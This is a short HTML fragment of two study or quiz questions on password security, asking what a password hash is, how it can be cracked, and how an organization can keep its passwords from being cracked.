<li>What is a <b>password hash</b>? How can a <i>password hash</i> be cracked?</li>
<li>What can an organization do to prevent passwords on their computer system from being cracked?</li>
</ol>